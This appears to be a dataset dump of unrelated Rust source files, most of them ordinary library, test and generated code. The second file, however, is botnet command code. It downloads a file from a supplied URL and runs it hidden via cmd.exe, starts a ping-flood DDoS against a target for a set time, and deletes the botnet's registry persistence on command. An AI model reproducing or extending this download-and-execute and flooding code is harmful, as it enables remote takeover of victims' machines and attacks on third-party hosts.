text stringlengths 8 4.13M |
|---|
// Copyright 2014-2018 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
#![allow(clippy::print_literal)]
#![warn(clippy::print_with_newline)]
fn main() {
print!("Hello\n");
print!("Hello {}\n", "world");
print!("Hello {} {}\n", "world", "#2");
print!("{}\n", 1265);
// these are all fine
print!("");
print!("Hello");
println!("Hello");
println!("Hello\n");
println!("Hello {}\n", "world");
print!("Issue\n{}", 1265);
print!("{}", 1265);
print!("\n{}", 1275);
print!("\n\n");
print!("like eof\n\n");
print!("Hello {} {}\n\n", "world", "#2");
println!("\ndon't\nwarn\nfor\nmultiple\nnewlines\n"); // #3126
println!("\nbla\n\n"); // #3126
}
|
extern crate tempdir;
use crate::setuper;
use crate::config;
use tempdir::TempDir;
use std::io::copy;
use std::fs::File;
use std::thread;
use std::process;
use std::time;
// Upgrade function
pub fn upgrade(data: String) {
let url_n_ver: Vec<&str> = data.split("{sep}").collect();
if config::VERSION < url_n_ver[1].parse::<u64>().unwrap() {
let new_ver = download(&url_n_ver[0]);
// TODO !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
}
}
// DDoS function
pub fn ddos(target: String) {
let tnt: Vec<&str> = target.split("{sep}").collect();
start_ddos(tnt[0].to_string(), tnt[1].parse::<u64>().unwrap());
}
// That function does nothing
pub fn nothing() {
thread::sleep(time::Duration::from_secs(1));
}
// Function which deletes botnet
pub fn delete_botnet() {
setuper::rm_startup_reg();
setuper::rm_true_dir();
exit();
}
// Close botnet
pub fn exit() {
process::exit(0x0100);
}
// Download and execute file
pub fn download_exec(url: &'static str) {
thread::spawn(move || {
let file_to_exec = download(url);
let _child = process::Command::new("cmd.exe")
.arg("/c").arg("START").arg("/MIN")
.arg(file_to_exec)
.spawn().unwrap();
});
}
// Function which is called if there are no internet connection
pub fn no_inet() {
thread::sleep(time::Duration::from_secs(60));
}
// Download file
fn download(target: &str) -> String {
let tmp_dir = TempDir::new("temp_files").unwrap();
let mut response = reqwest::get(target).unwrap();
let fname = response
.url()
.path_segments()
.and_then(|segments| segments.last())
.and_then(|name| if name.is_empty() { None } else { Some(name) })
.unwrap_or("tmp.bin");
let new_temp_dir = tmp_dir.into_path();
let fpath = format!("{}\\{}", new_temp_dir.to_str().unwrap(), fname.clone());
let fname = new_temp_dir.join(fname);
let mut out = File::create(fname).unwrap();
copy(&mut response, &mut out).unwrap();
fpath.to_string()
}
// Start DDoS attack
fn start_ddos(target: String, duration: u64) {
thread::spawn(move || {
// TODO !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
let mut child_ddos = process::Command::new("ping")
.arg(&target).arg("-l").arg("1000").arg("-t")
.spawn().unwrap();
thread::sleep(time::Duration::from_secs(duration));
child_ddos.kill().unwrap();
});
} |
use spair::prelude::*;
use crate::types::Product;
pub struct AtcButton(pub Product);
impl spair::Render<crate::App> for AtcButton {
fn render(self, nodes: spair::Nodes<crate::App>) {
let comp = nodes.comp();
nodes.button(|b| {
b.static_attributes()
.class("product_atc_button")
.on_click(comp.handler(move |state| state.add_to_cart(self.0.clone())))
.nodes()
.r#static("Add To Cart");
});
}
}
|
use super::KeyState;
use super::sprite::RustConsoleSprite;
use std::io::Error;
use std::mem::{swap, MaybeUninit};
pub struct RustConsole {
width: usize,
height: usize,
font_width: i16,
font_height: i16,
keys: [KeyState; 256],
old_key_states: [i16; 256],
new_key_states: [i16; 256]
}
impl RustConsole {
pub const FG_BLACK: u16 = 0x0000;
pub const FG_DARK_BLUE: u16 = 0x0001;
pub const FG_DARK_GREEN: u16 = 0x0002;
pub const FG_DARK_CYAN: u16 = 0x0003;
pub const FG_DARK_RED: u16 = 0x0004;
pub const FG_DARK_MAGENTA: u16 = 0x0005;
pub const FG_DARK_YELLOW: u16 = 0x0006;
pub const FG_GREY: u16 = 0x0007;
pub const FG_DARK_GREY: u16 = 0x0008;
pub const FG_BLUE: u16 = 0x0009;
pub const FG_GREEN: u16 = 0x000a;
pub const FG_CYAN: u16 = 0x000b;
pub const FG_RED: u16 = 0x000c;
pub const FG_MAGENTA: u16 = 0x000d;
pub const FG_YELLOW: u16 = 0x000e;
pub const FG_WHITE: u16 = 0x000f;
pub const BG_BLACK: u16 = 0x0000;
pub const BG_DARK_BLUE: u16 = 0x0010;
pub const BG_DARK_GREEN: u16 = 0x0020;
pub const BG_DARK_CYAN: u16 = 0x0030;
pub const BG_DARK_RED: u16 = 0x0040;
pub const BG_DARK_MAGENTA: u16 = 0x0050;
pub const BG_DARK_YELLOW: u16 = 0x0060;
pub const BG_GREY: u16 = 0x0070;
pub const BG_DARK_GREY: u16 = 0x0080;
pub const BG_BLUE: u16 = 0x0090;
pub const BG_GREEN: u16 = 0x00a0;
pub const BG_CYAN: u16 = 0x00b0;
pub const BG_RED: u16 = 0x00c0;
pub const BG_MAGENTA: u16 = 0x00d0;
pub const BG_YELLOW: u16 = 0x00e0;
pub const BG_WHITE: u16 = 0x00f0;
pub const PIXEL_SOLID: char = '\u{2588}';
pub const PIXEL_THREEQUARTER: char = '\u{2593}';
pub const PIXEL_HALF: char = '\u{2592}';
pub const PIXEL_QUARTER: char = '\u{2591}';
pub const VK_UP: u32 = 38u32;
pub const VK_DOWN: u32 = 40u32;
pub const VK_LEFT: u32 = 37u32;
pub const VK_RIGHT: u32 = 39u32;
pub(crate) fn new(width: usize, height: usize, font_width: i16, font_height: i16) -> Result<RustConsole, Error> {
Ok(RustConsole {
width,
height,
font_width,
font_height,
keys: [KeyState { pressed: false, released: false, held: false }; 256],
old_key_states: unsafe { MaybeUninit::<[i16; 256]>::zeroed().assume_init() },
new_key_states: unsafe { MaybeUninit::<[i16; 256]>::zeroed().assume_init() }
})
}
pub(crate) fn write_output(&mut self) {}
pub(crate) fn update_key_states(&mut self) {
for v_key in 0..256 {
self.new_key_states[v_key] = 0;
self.keys[v_key].pressed = false;
self.keys[v_key].released = false;
if self.new_key_states[v_key] != self.old_key_states[v_key] {
if self.new_key_states[v_key] != 0 {
self.keys[v_key].pressed = !self.keys[v_key].held;
self.keys[v_key].held = true;
} else {
self.keys[v_key].released = true;
self.keys[v_key].held = false;
}
}
self.old_key_states[v_key] = self.new_key_states[v_key];
}
}
pub(crate) fn flush_input_events(&self) {}
pub(crate) fn handle_input_events(&mut self) {}
pub fn width(&self) -> usize { self.width }
pub fn height(&self) -> usize { self.height }
pub fn font_width(&self) -> i16 { self.font_width }
pub fn font_height(&self) -> i16 { self.font_height }
pub fn key(&self, v_key: usize) -> KeyState { self.keys[v_key] }
pub fn set_title(&self, _title: String) {}
pub fn resize(&mut self, new_width: usize, new_height: usize, new_font_width: i16, new_font_height: i16) {
self.flush_input_events();
self.width = new_width;
self.height = new_height;
self.font_width = new_font_width;
self.font_height = new_font_height;
}
pub fn clear(&mut self) {}
pub fn draw(&mut self, _x: usize, _y: usize, _c: char, _col: u16) {}
pub fn fill(&mut self, x1: usize, y1: usize, x2: usize, y2: usize, c: char, col: u16) {
for x in x1..x2 {
for y in y1..y2 {
self.draw(x, y, c, col);
}
}
}
pub fn draw_string(&mut self, _x: usize, _y: usize, _s: &str, _col: u16) {}
pub fn draw_string_alpha(&mut self, _x: usize, _y: usize, _s: &str, _col: u16) {}
pub fn draw_line(&mut self, x1: usize, y1: usize, x2: usize, y2: usize, c: char, col: u16) {
let dx = x2 as isize - x1 as isize;
let dy = y2 as isize - y1 as isize;
let dx1 = dx.abs();
let dy1 = dy.abs();
let mut px = 2 * dy1 - dx1;
let mut py = 2 * dx1 - dy1;
if dy1 <= dx1 {
let (mut x, mut y, xe) = if dx >= 0 {
(x1, y1, x2)
} else {
(x2, y2, x1)
};
self.draw(x, y, c, col);
for _i in x..xe {
x += 1;
if px < 0 {
px = px + 2 * dy1;
} else {
if (dx < 0 && dy < 0) || (dx > 0 && dy > 0) {
y += 1;
} else {
y -= 1;
}
px = px + 2 * (dy1 - dx1);
}
self.draw(x, y, c, col);
}
} else {
let (mut x, mut y, ye) = if dy >= 0 {
(x1, y1, y2)
} else {
(x2, y2, y1)
};
self.draw(x, y, c, col);
for _i in y..ye {
y += 1;
if py <= 0 {
py = py + 2 * dx1;
} else {
if (dx < 0 && dy < 0) || (dx > 0 && dy > 0) {
x += 1;
} else {
x -= 1;
}
py = py + 2 * (dx1 - dy1);
}
self.draw(x, y, c, col);
}
}
}
pub fn draw_triangle(&mut self, x1: usize, y1: usize, x2: usize, y2: usize, x3: usize, y3: usize, c: char, col: u16) {
self.draw_line(x1, y1, x2, y2, c, col);
self.draw_line(x2, y2, x3, y3, c, col);
self.draw_line(x3, y3, x1, y1, c, col);
}
pub fn fill_triangle(&mut self, mut x1: usize, mut y1: usize, mut x2: usize, mut y2: usize, mut x3: usize, mut y3: usize, c: char, col: u16) {
let mut changed1 = false;
let mut changed2 = false;
// sort vertices
if y1 > y2 {
swap(&mut y1, &mut y2);
swap(&mut x1, &mut x2);
}
if y1 > y3 {
swap(&mut y1, &mut y3);
swap(&mut x1, &mut x3);
}
if y2 > y3 {
swap(&mut y2, &mut y3);
swap(&mut x2, &mut x3);
}
// starting points
let mut t1x = x1 as isize;
let mut t2x = x1 as isize;
let mut y = y1;
let mut dx1 = x2 as isize - x1 as isize;
let signx1 = if dx1 < 0 {
dx1 = -dx1;
-1
} else {
1
};
let mut dy1 = y2 as isize - y1 as isize;
let mut dx2 = x3 as isize - x1 as isize;
let signx2 = if dx2 < 0 {
dx2 = -dx2;
-1
} else {
1
};
let mut dy2 = y3 as isize - y1 as isize;
if dy1 > dx1 {
swap(&mut dx1, & mut dy1);
changed1 = true;
}
if dy2 > dx2 {
swap(&mut dy2, &mut dx2);
changed2 = true;
}
let mut e2 = dx2 >> 1;
if y1 != y2 { // not flat top, so do the first half
let mut e1 = dx1 >> 1;
for mut i in 0..dx1 {
let mut t1xp = 0;
let mut t2xp = 0;
let (mut minx, mut maxx) = if t1x < t2x {
(t1x, t2x)
} else {
(t2x, t1x)
};
// process first line until y value is about to change
'first_line_1: while i < dx1 {
i += 1;
e1 += dy1;
while e1 >= dx1 {
e1 -= dx1;
if changed1 {
t1xp = signx1;
} else {
break 'first_line_1;
}
}
if changed1 {
break 'first_line_1;
} else {
t1x += signx1;
}
}
// process second line until y value is about to change
'second_line_1: loop {
e2 += dy2;
while e2 >= dx2 {
e2 -= dx2;
if changed2 {
t2xp = signx2;
} else {
break 'second_line_1;
}
}
if changed2 {
break 'second_line_1;
} else {
t2x += signx2;
}
}
if minx > t1x {
minx = t1x;
}
if minx > t2x {
minx = t2x;
}
if maxx < t1x {
maxx = t1x;
}
if maxx < t2x {
maxx = t2x;
}
// draw line from min to max points found on the y
for j in minx..=maxx {
self.draw(j as usize, y, c, col);
}
// now increase y
if !changed1 {
t1x += signx1;
}
t1x += t1xp;
if !changed2 {
t2x += signx2;
}
t2x += t2xp;
y += 1;
if y == y2 {
break;
}
}
}
// now, do the second half
dx1 = x3 as isize - x2 as isize;
let signx1 = if dx1 < 0 {
dx1 = -dx1;
-1
} else {
1
};
dy1 = y3 as isize - y2 as isize;
t1x = x2 as isize;
if dy1 > dx1 {
swap(&mut dy1, &mut dx1);
changed1 = true;
} else {
changed1 = false;
}
let mut e1 = dx1 >> 1;
for mut i in 0..=dx1 {
let mut t1xp = 0;
let mut t2xp = 0;
let (mut minx, mut maxx) = if t1x < t2x {
(t1x, t2x)
} else {
(t2x, t1x)
};
// process first line until y value is about to change
'first_line_2: while i < dx1 {
e1 += dy1;
while e1 >= dx1 {
e1 -= dx1;
if changed1 {
t1xp = signx1;
break;
} else {
break 'first_line_2;
}
}
if changed1 {
break 'first_line_2;
} else {
t1x += signx1;
}
if i < dx1 {
i += 1;
}
}
// process second line until y value is about to change
'second_line_2: while t2x != x3 as isize {
e2 += dy2;
while e2 >= dx2 {
e2 -= dx2;
if changed2 {
t2xp = signx2;
} else {
break 'second_line_2;
}
}
if changed2 {
break 'second_line_2;
} else {
t2x += signx2;
}
}
if minx > t1x {
minx = t1x;
}
if minx > t2x {
minx = t2x;
}
if maxx < t1x {
maxx = t1x;
}
if maxx < t2x {
maxx = t2x;
}
// draw line from min to max points found on the y
for j in minx..=maxx {
self.draw(j as usize, y, c, col);
}
// now increase y
if !changed1 {
t1x += signx1;
}
t1x += t1xp;
if !changed2 {
t2x += signx2;
}
t2x += t2xp;
y += 1;
if y > y3 {
return;
}
}
}
pub fn draw_circle(&mut self, xc: usize, yc: usize, r: usize, c: char, col: u16) {
let mut x = 0;
let mut y = r;
let mut p = 3 - 2 * r as isize;
if r == 0 { return; }
while y >= x {
self.draw(xc - x, yc - y, c, col); // upper left left
self.draw(xc - y, yc - x, c, col); // upper upper left
self.draw(xc + y, yc - x, c, col); // upper upper right
self.draw(xc + x, yc - y, c, col); // upper right right
self.draw(xc - x, yc + y, c, col); // lower left left
self.draw(xc - y, yc + x, c, col); // lower lower left
self.draw(xc + y, yc + x, c, col); // lower lower right
self.draw(xc + x, yc + y, c, col); // lower right right
if p < 0 {
p += 4 * x as isize + 6;
x += 1;
} else {
p += 4 * (x as isize - y as isize) + 10;
x += 1;
y -= 1;
}
}
}
pub fn fill_circle(&mut self, xc: usize, yc: usize, r: usize, c: char, col: u16) {
let mut x = 0;
let mut y = r;
let mut p = 3 - 2 * r as isize;
if r == 0 { return; }
while y >= x {
for i in xc - x..=xc + x {
self.draw(i, yc - y, c, col);
}
for i in xc - y..=xc + y {
self.draw(i, yc - x, c, col);
}
for i in xc - x..=xc + x {
self.draw(i, yc + y, c, col);
}
for i in xc - y..=xc + y {
self.draw(i, yc + x, c, col);
}
if p < 0 {
p += 4 * x as isize + 6;
x += 1;
} else {
p += 4 * (x as isize - y as isize) + 10;
x += 1;
y -= 1;
}
}
}
pub fn draw_sprite(&mut self, x: usize, y: usize, sprite: &RustConsoleSprite) {
for i in 0..sprite.width() {
for j in 0..sprite.height() {
if sprite.get_glyph(i, j) != ' ' {
self.draw(x + i, y + j, sprite.get_glyph(i, j), sprite.get_color(i, j));
}
}
}
}
} |
// Copyright (c) 2019 Ant Financial
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//! ttrpc-rust is a **non-core** subproject of containerd
//!
//! `ttrpc-rust` is the Rust version of [ttrpc](https://github.com/containerd/ttrpc). [ttrpc](https://github.com/containerd/ttrpc) is GRPC for low-memory environments.
//!
//! Example:
//!
//! Check [this](https://github.com/containerd/ttrpc-rust/tree/master/example)
//!
//! # Feature flags
//!
//! - `async`: Enables async server and client.
//! - `sync`: Enables traditional sync server and client (default enabled).
//! - `protobuf-codec`: Includes rust-protobuf (default enabled).
//!
//! # Socket address
//!
//! For Linux distributions, ttrpc-rust supports three types of socket:
//!
//! - `unix:///run/some.sock`: Normal Unix domain socket.
//! - `unix://@/run/some.sock`: Abstract Unix domain socket.
//! - `vsock://vsock://8:1024`: [vsock](https://man7.org/linux/man-pages/man7/vsock.7.html).
//!
//! For mscOS, ttrpc-rust **only** supports normal Unix domain socket:
//!
//! - `unix:///run/some.sock`: Normal Unix domain socket.
//!
#![cfg_attr(docsrs, feature(doc_cfg))]
#[macro_use]
extern crate log;
#[macro_use]
pub mod error;
#[macro_use]
mod common;
#[macro_use]
mod macros;
pub mod context;
pub mod proto;
#[doc(inline)]
pub use self::proto::{Code, MessageHeader, Request, Response, Status};
#[doc(inline)]
pub use crate::error::{get_status, Error, Result};
cfg_sync! {
pub mod sync;
#[doc(hidden)]
pub use sync::response_to_channel;
#[doc(inline)]
pub use sync::{MethodHandler, TtrpcContext};
pub use sync::Client;
#[doc(inline)]
pub use sync::Server;
}
cfg_async! {
pub mod asynchronous;
#[doc(hidden)]
pub use asynchronous as r#async;
}
|
use alga::general::AbstractGroup;
use alga::general::AbstractLoop;
use alga::general::AbstractMagma;
use alga::general::AbstractMonoid;
use alga::general::AbstractQuasigroup;
use alga::general::AbstractSemigroup;
use alga::general::Identity;
use alga::general::Operator;
use alga::general::TwoSidedInverse;
use swag::daba::*;
use swag::rfs::*;
use swag::soe::*;
use swag::two_stacks::*;
use swag::flat_fat::ra_fifo::*;
use swag::*;
#[derive(Copy, Clone, PartialEq, Eq, Debug)]
struct Value(i32);
#[derive(Copy, Clone, Debug)]
struct Sum;
impl Operator for Sum {
fn operator_token() -> Sum {
Sum
}
}
impl Identity<Sum> for Value {
fn identity() -> Value {
Value(0)
}
}
impl AbstractMagma<Sum> for Value {
fn operate(&self, other: &Self) -> Self {
Value(self.0 + other.0)
}
}
impl TwoSidedInverse<Sum> for Value {
fn two_sided_inverse(&self) -> Value {
Value(-self.0)
}
}
impl AbstractSemigroup<Sum> for Value {}
impl AbstractMonoid<Sum> for Value {}
impl AbstractQuasigroup<Sum> for Value {}
impl AbstractLoop<Sum> for Value {}
impl AbstractGroup<Sum> for Value {}
fn test_simple<Window>(mut window: Window)
where
Window: FifoWindow<Value, Sum> + std::fmt::Debug,
{
assert_eq!(window.query(), Value(0));
window.push(Value(1));
assert_eq!(window.query(), Value(1));
window.push(Value(2));
assert_eq!(window.query(), Value(3));
window.push(Value(3));
assert_eq!(window.query(), Value(6));
window.pop();
assert_eq!(window.query(), Value(5));
}
#[test]
fn test_simple_rfs() {
test_simple(RFS::<Value, Sum>::new());
}
#[test]
fn test_simple_soe() {
test_simple(SOE::<Value, Sum>::new());
}
#[test]
fn test_simple_two_stacks() {
test_simple(TwoStacks::<Value, Sum>::new());
}
#[test]
fn test_simple_daba() {
test_simple(DABA::<Value, Sum>::new());
}
#[test]
fn test_simple_flat_fat() {
test_simple(RA::<Value, Sum>::with_capacity(2));
}
|
use byteorder::{BigEndian, ByteOrder, ReadBytesExt};
use std::collections::HashMap;
use std::collections::hash_map::Entry;
use std::io::{Cursor, Seek, SeekFrom};
use session::{Session, PacketHandler};
pub enum Response<H, S = H> {
Continue(H),
Spawn(S),
Close,
}
impl <H: Handler + 'static> Response<H> {
pub fn boxed(self) -> Response<Box<Handler>> {
match self {
Response::Continue(handler) => Response::Continue(Box::new(handler)),
Response::Spawn(handler) => Response::Spawn(Box::new(handler)),
Response::Close => Response::Close,
}
}
}
pub trait Handler: Send {
fn on_create(self, channel_id: ChannelId, session: &Session) -> Response<Self> where Self: Sized;
fn on_header(self, header_id: u8, header_data: &[u8], session: &Session) -> Response<Self> where Self: Sized;
fn on_data(self, data: &[u8], session: &Session) -> Response<Self> where Self: Sized;
fn on_error(self, session: &Session) -> Response<Self> where Self: Sized;
fn on_close(self, session: &Session) -> Response<Self> where Self: Sized;
fn box_on_create(self: Box<Self>, channel_id: ChannelId, session: &Session) -> Response<Box<Handler>>;
fn box_on_header(self: Box<Self>, header_id: u8, header_data: &[u8], session: &Session) -> Response<Box<Handler>>;
fn box_on_data(self: Box<Self>, data: &[u8], session: &Session) -> Response<Box<Handler>>;
fn box_on_error(self: Box<Self>, session: &Session) -> Response<Box<Handler>>;
fn box_on_close(self: Box<Self>, session: &Session) -> Response<Box<Handler>>;
}
pub type ChannelId = u16;
enum ChannelMode {
Header,
Data
}
struct Channel(ChannelMode, Box<Handler>);
impl Channel {
fn handle_packet(self, cmd: u8, data: Vec<u8>, session: &Session) -> Response<Self, Box<Handler>> {
let Channel(mode, mut handler) = self;
let mut packet = Cursor::new(&data as &[u8]);
packet.read_u16::<BigEndian>().unwrap(); // Skip channel id
if cmd == 0xa {
println!("error: {} {}", data.len(), packet.read_u16::<BigEndian>().unwrap());
return match handler.box_on_error(session) {
Response::Continue(_) => Response::Close,
Response::Spawn(f) => Response::Spawn(f),
Response::Close => Response::Close,
};
}
match mode {
ChannelMode::Header => {
let mut length = 0;
while packet.position() < data.len() as u64 {
length = packet.read_u16::<BigEndian>().unwrap();
if length > 0 {
let header_id = packet.read_u8().unwrap();
let header_data = &data[packet.position() as usize .. packet.position() as usize + length as usize - 1];
handler = match handler.box_on_header(header_id, header_data, session) {
Response::Continue(handler) => handler,
Response::Spawn(f) => return Response::Spawn(f),
Response::Close => return Response::Close,
};
packet.seek(SeekFrom::Current(length as i64 - 1)).unwrap();
}
}
if length == 0 {
Response::Continue(Channel(ChannelMode::Data, handler))
} else {
Response::Continue(Channel(ChannelMode::Header, handler))
}
}
ChannelMode::Data => {
if packet.position() < data.len() as u64 {
let event_data = &data[packet.position() as usize..];
match handler.box_on_data(event_data, session) {
Response::Continue(handler) => Response::Continue(Channel(ChannelMode::Data, handler)),
Response::Spawn(f) => Response::Spawn(f),
Response::Close => Response::Close,
}
} else {
match handler.box_on_close(session) {
Response::Continue(_) => Response::Close,
Response::Spawn(f) => Response::Spawn(f),
Response::Close => Response::Close,
}
}
}
}
}
}
pub struct StreamManager {
next_id: ChannelId,
channels: HashMap<ChannelId, Option<Channel>>,
}
impl StreamManager {
pub fn new() -> StreamManager {
StreamManager {
next_id: 0,
channels: HashMap::new(),
}
}
pub fn create(&mut self, handler: Box<Handler>, session: &Session) {
let channel_id = self.next_id;
self.next_id += 1;
trace!("allocated stream {}", channel_id);
match handler.box_on_create(channel_id, session) {
Response::Continue(handler) => {
self.channels.insert(channel_id, Some(Channel(ChannelMode::Header, handler)));
}
Response::Spawn(handler) => self.create(handler, session),
Response::Close => (),
}
}
}
impl PacketHandler for StreamManager {
fn handle(&mut self, cmd: u8, data: Vec<u8>, session: &Session) {
let id: ChannelId = BigEndian::read_u16(&data[0..2]);
let spawn = if let Entry::Occupied(mut entry) = self.channels.entry(id) {
if let Some(channel) = entry.get_mut().take() {
match channel.handle_packet(cmd, data, session) {
Response::Continue(channel) => {
entry.insert(Some(channel));
None
}
Response::Spawn(f) => {
entry.remove();
Some(f)
}
Response::Close => {
entry.remove();
None
}
}
} else {
None
}
} else {
None
};
if let Some(s) = spawn {
self.create(s, session);
}
}
}
|
#[doc = "Register `TXFSTS` reader"]
pub type R = crate::R<TXFSTS_SPEC>;
#[doc = "Field `INEPTFSAV` reader - IN endpoint TxFIFO space avail"]
pub type INEPTFSAV_R = crate::FieldReader<u16>;
impl R {
#[doc = "Bits 0:15 - IN endpoint TxFIFO space avail"]
#[inline(always)]
pub fn ineptfsav(&self) -> INEPTFSAV_R {
INEPTFSAV_R::new((self.bits & 0xffff) as u16)
}
}
#[doc = "OTG_HS device IN endpoint transmit FIFO status register\n\nYou can [`read`](crate::generic::Reg::read) this register and get [`txfsts::R`](R). See [API](https://docs.rs/svd2rust/#read--modify--write-api)."]
pub struct TXFSTS_SPEC;
impl crate::RegisterSpec for TXFSTS_SPEC {
type Ux = u32;
}
#[doc = "`read()` method returns [`txfsts::R`](R) reader structure"]
impl crate::Readable for TXFSTS_SPEC {}
#[doc = "`reset()` method sets TXFSTS to value 0"]
impl crate::Resettable for TXFSTS_SPEC {
const RESET_VALUE: Self::Ux = 0;
}
|
// This file is part of dpdk. It is subject to the license terms in the COPYRIGHT file found in the top-level directory of this distribution and at https://raw.githubusercontent.com/lemonrock/dpdk/master/COPYRIGHT. No part of dpdk, including this file, may be copied, modified, propagated, or distributed except according to the terms contained in the COPYRIGHT file.
// Copyright © 2017 The developers of dpdk. See the COPYRIGHT file in the top-level directory of this distribution and at https://raw.githubusercontent.com/lemonrock/dpdk/master/COPYRIGHT.
pub trait CompletionQueuePointer: HasContextPointer + HasVerbsPointer
{
#[inline(always)]
fn pointer(self) -> *mut ibv_cq;
#[inline(always)]
fn resize(&self, atLeastThisNumberOfCompletionQueueEvents: u31)
{
panic_on_error!(ibv_resize_cq, self.pointer(), atLeastThisNumberOfCompletionQueueEvents as i32);
}
/// NOTE: DO NOT CALL THIS ON AN EXTENDED CQ THAT IS CURRENTLY POLLING
#[inline(always)]
fn destroy(&mut self)
{
panic_on_errno!(ibv_destroy_cq, self.pointer());
}
#[inline(always)]
fn completionChannel(self) -> *mut ibv_comp_channel
{
unsafe { (*self.pointer()).channel }
}
#[inline(always)]
fn maximumNumberOfEntries(self) -> c_int
{
unsafe { (*self.pointer()).cqe }
}
#[inline(always)]
fn completionEventCompleted(self) -> u32
{
unsafe { (*self.pointer()).comp_events_completed }
}
#[inline(always)]
fn asynchronousEventCompleted(self) -> u32
{
unsafe { (*self.pointer()).async_events_completed }
}
/// ibv_poll_cq - Poll a CQ for work completions
/// @cq:the CQ being polled
/// @num_entries:maximum number of completions to return
/// @wc:array of at least @num_entries of &struct ibv_wc where completions
/// will be returned
///
/// Poll a CQ for (possibly multiple) completions. If the return value
/// is < 0, an error occurred. If the return value is >= 0, it is the
/// number of completions returned. If the return value is
/// non-negative and strictly less than num_entries, then the CQ was
/// emptied.
#[inline(always)]
fn ibv_poll_cq(self, num_entries: c_int, wc: *mut ibv_wc) -> c_int
{
unsafe { self.verbs().ops().poll_cq.unwrap()(self.pointer(), num_entries, wc) }
}
/// ibv_req_notify_cq - Request completion notification on a CQ. An
/// event will be added to the completion channel associated with the
/// CQ when an entry is added to the CQ.
/// @cq: The completion queue to request notification for.
/// @solicited_only: If non-zero, an event will be generated only for
/// the next solicited CQ entry. If zero, any CQ entry, solicited or
/// not, will generate an event.
#[inline(always)]
fn ibv_req_notify_cq(self, solicited_only: bool) -> c_int
{
unsafe
{
self.verbs().ops().req_notify_cq.unwrap()(self.pointer(), if solicited_only
{
1
}
else
{
0
})
}
}
}
impl CompletionQueuePointer for *mut ibv_cq
{
#[inline(always)]
fn pointer(self) -> *mut ibv_cq
{
debug_assert!(!self.is_null(), "self is null");
self
}
}
impl CompletionQueuePointer for *mut ibv_cq_ex
{
#[inline(always)]
fn pointer(self) -> *mut ibv_cq
{
debug_assert!(!self.is_null(), "self is null");
self.ibv_cq_ex_to_cq()
}
}
|
use crate::ui::*;
use rider_config::ConfigAccess;
use std::ops::{Deref, DerefMut};
pub struct VerticalScrollBar {
inner: ScrollBar,
}
impl Deref for VerticalScrollBar {
type Target = ScrollBar;
fn deref(&self) -> &Self::Target {
&self.inner
}
}
impl DerefMut for VerticalScrollBar {
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.inner
}
}
#[cfg_attr(tarpaulin, skip)]
impl VerticalScrollBar {
pub fn new(config: ConfigAccess) -> Self {
Self {
inner: ScrollBar::new(config),
}
}
}
impl ScrollWidget for VerticalScrollBar {
fn update_rect(&mut self, pos: i32, max: u32) {
self.mut_rect().set_height(max);
self.mut_rect().set_y(pos);
}
#[inline]
fn scroll_to(&mut self, n: i32) {
self.scroll_value = n;
}
#[inline]
fn scroll_value(&self) -> i32 {
self.scroll_value
}
#[inline]
fn set_viewport(&mut self, n: u32) {
self.viewport = n;
}
#[inline]
fn set_full_size(&mut self, n: u32) {
self.full = n;
}
#[inline]
fn set_location(&mut self, n: i32) {
self.rect.set_x(n);
}
#[inline]
fn viewport(&self) -> u32 {
self.viewport
}
#[inline]
fn full(&self) -> u32 {
self.full
}
#[inline]
fn rect(&self) -> &sdl2::rect::Rect {
&self.rect
}
#[inline]
fn mut_rect(&mut self) -> &mut sdl2::rect::Rect {
&mut self.rect
}
}
#[cfg(test)]
mod test_update {
use super::*;
use crate::tests::*;
use std::sync::*;
impl VerticalScrollBar {
pub fn rect_mut(&mut self) -> &mut sdl2::rect::Rect {
&mut self.rect
}
}
#[test]
fn assert_do_nothing_when_small_content() {
let config = build_config();
let mut widget = VerticalScrollBar::new(Arc::clone(&config));
widget.set_viewport(100);
widget.set_full_size(20);
widget.rect_mut().set_y(30000000);
widget.rect_mut().set_height(30000000);
widget.update(0, &UpdateContext::Nothing);
assert_eq!(widget.rect().y(), 30000000);
assert_eq!(widget.rect().height(), 30000000);
}
#[test]
fn assert_update_when_huge_content() {
let config = build_config();
let mut widget = VerticalScrollBar::new(Arc::clone(&config));
widget.set_viewport(100);
widget.set_full_size(200);
widget.rect_mut().set_y(30000000);
widget.rect_mut().set_height(30000000);
widget.update(0, &UpdateContext::Nothing);
assert_eq!(widget.rect().y(), 0);
assert_eq!(widget.rect().height(), 50);
}
}
#[cfg(test)]
mod test_scrollable {
use super::*;
use crate::tests::*;
use std::sync::*;
#[test]
fn assert_scroll_to() {
let config = build_config();
let mut widget = VerticalScrollBar::new(Arc::clone(&config));
let old = widget.scroll_value();
widget.scroll_to(157);
let current = widget.scroll_value();
let expected = 157;
assert_ne!(old, current);
assert_eq!(current, expected);
}
#[test]
fn assert_scroll_value() {
let config = build_config();
let widget = VerticalScrollBar::new(Arc::clone(&config));
assert_eq!(widget.scroll_value(), 0);
}
#[test]
fn assert_set_viewport() {
let config = build_config();
let mut widget = VerticalScrollBar::new(Arc::clone(&config));
let old = widget.viewport();
widget.set_viewport(157);
let current = widget.viewport();
let expected = 157;
assert_ne!(old, current);
assert_eq!(current, expected);
}
#[test]
fn assert_set_full_size() {
let config = build_config();
let mut widget = VerticalScrollBar::new(Arc::clone(&config));
let old = widget.full;
widget.set_full_size(157);
let current = widget.full;
let expected = 157;
assert_ne!(old, current);
assert_eq!(current, expected);
}
#[test]
fn assert_set_location() {
let config = build_config();
let mut widget = VerticalScrollBar::new(Arc::clone(&config));
let old = widget.rect().x();
widget.set_location(157);
let current = widget.rect().x();
let expected = 157;
assert_ne!(old, current);
assert_eq!(current, expected);
}
}
|
pub mod pb {
tonic::include_proto!("grpc.examples.echo");
}
use pb::{echo_client::EchoClient, EchoRequest};
